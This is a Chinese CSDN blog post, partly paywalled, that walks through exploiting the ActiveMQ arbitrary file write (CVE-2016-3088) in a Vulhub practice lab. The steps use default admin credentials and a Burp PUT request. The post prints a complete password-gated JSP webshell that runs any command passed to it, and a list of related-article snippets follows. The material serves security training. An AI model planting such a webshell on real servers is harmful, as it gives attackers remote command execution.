vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞

最新推荐文章于 2024-04-10 11:50:57 发布
最新推荐文章于 2024-04-10 11:50:57 发布
阅读量1.8k 收藏 4
点赞数 1
分类专栏: vulhub 文章标签: vulhub ActiveMQ CVE20163088
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38632151/article/details/102975086
版权
本文介绍了如何利用CVE-2016-3088漏洞在ActiveMQ靶场中进行渗透测试。实验包括登录ActiveMQ靶站,使用PUT和MOVE方法写入并执行webshell,详细解释了漏洞原理和源码分析,并列举了其他可能的利用方式。
摘要由CSDN通过智能技术生成

Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。
本篇的内容是完成ActiveMQ任意文件写入漏洞(CVE-2016-3088)

ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

本篇我就先进行一次完整的实验过程,然后再按照自己的理解来详细讲解。

目录

实验步骤

1.进入ActiveMQ靶站
在这里插入图片描述
实验需要进行登录,点击“Manage ActiveMQ broker”,登录,账号密码都是admin,进入之后效果如下:
在这里插入图片描述

2.然后进入首页下的fileserver这个文件夹里
在这里插入图片描述
bp抓包(刷新一下页面就行),然后send to repeater,改成put方法,写入shell,代码如下:

<%
  	if("023".equals(request.getParameter("pwd"))){
   
  		java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  		int a = -1;
  		byte[] b = new byte[2048];
  		out.print("<pre>");
  		while((a=in.read(b))!=-1){
   
  			out.println(new String(b));
  		}
  		out.print("</pre>");
  	}
%>

最低0.47元/天 解锁文章
Regenwald
关注
专栏目录
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞CVE-2016-3088
JiangBuLiu的博客
06-27 1854
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
【安全攻防实验-3】Vulhub练习-shiro
qq_26579613的博客
02-08 951
1、打开测试环境 cd /安装目录/vulmaster/shiro/CVE-2016-4437 #查看测试说明 more READ.md 打开测试环境 docker-compose up -d 2、使用渗透工具练习 使用shiro-tool获取了root权限 3、关闭测试环境 docker-compose down ...
02 - vulhub - ActiveMQ任意文件写入漏洞 - CVE-2016-3088 复现
易编橙 · 终身成长社群,相遇已是上上签!
09-22 789
漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
FryhRx的博客
04-05 4791
Vluhub漏洞ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
vulhub漏洞——ActiveMQ
weixin_45808483的博客
12-07 777
访问 3128 端口 Goby扫描资产
vulhub靶场练习
07-28
- *2* *3* [vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞](https://blog.csdn.net/qq_38632151/article/details/102975086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
Vulhub靶场
blalaa的博客
09-05 1772
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
Vulhub靶场ActiveMQ任意文件上传漏洞复现
X_python321的博客
05-08 553
Vulhub靶场ActiveMQ任意文件上传漏洞复现
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1248
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
vulhub ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
箭雨镜屋
05-23 1414
引言 今天来复现一下ActiveMQ任意文件写入漏洞 (CVE-2016-3088) vulhub的官网有对这个漏洞的英文介绍ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) 本文主要分为三个部分: 漏洞原理(基于vulhub)以及知识点引申 漏洞复现 漏洞引发的思考 漏洞介绍和知识拓展 背景简述和漏洞详情部分来源于vulhub 背景简述 ActiveMQ的web控制台分为三个应用,admin、api和fileserver,其中ad
CVE-2016-3088
龙卷风摧毁停车场
02-24 331
2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。
ActiveMQ--CVE-2016-3088
weixin_37639863的博客
02-17 747
cve-2016-3088|LOFTER(乐乎) - 让兴趣,更有趣cve-2016-3088相关日志 - LOFTERhttp://www.lofter.com/tag/CVE-2016-3088 ActiveMQ任意文件写入漏洞CVE-2016-3088)_skr...的博客-CSDN博客ActiveMQ任意文件写入漏洞CVE-2016-3088ActiveMQ介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、...
vulhubActiveMQ
最新发布
weixin_56306210的博客
04-10 767
vulhubActiveMQ
msf 实战 vulhub/activemq/cve-2016-3088 复现
wing_7的博客
10-04 523
一般情况信息收集发现主机使用的OS 版本、server版本如Apache MySQL 等版本信息进行检查版信息。cve-2016-3088 由于我们知道对应漏洞信息我们可以进行搜素CVEid。使用show options显示CVE模块所需参数。set RHOST 是目标主机的IP地址。nmap 进行信息手收集指定端口会更好。set LHOST 本机ip地址。启动msfconsole。不指定基本没啥有用信息。
vulhub-activemq-cve-2016-3088
Ronin_qianmo的博客
07-28 350
1、漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。 2、漏洞原理 ActiveMQ Web控制台分为三个应用程
CVE-2016-3088ActiveMQ任意文件写入漏洞
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1622
漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞
vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2632
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
vulhub漏洞复现之ActiveMQ(CVE-2015-5254、CVE-2016-3088)
weixin_43071873的博客
11-25 301
记录这次一点都不顺利的漏洞复现,两个漏洞都没能反弹shell,getshell,记录复现过程,或许对各位有一丢丢得作用,过程可能比较粗糙,还请各位见谅 ActiveMQ 反序列化漏洞CVE-2015-5254) 漏洞简介: Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 影响版本: Apache ActiveMQ 5.13.0
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值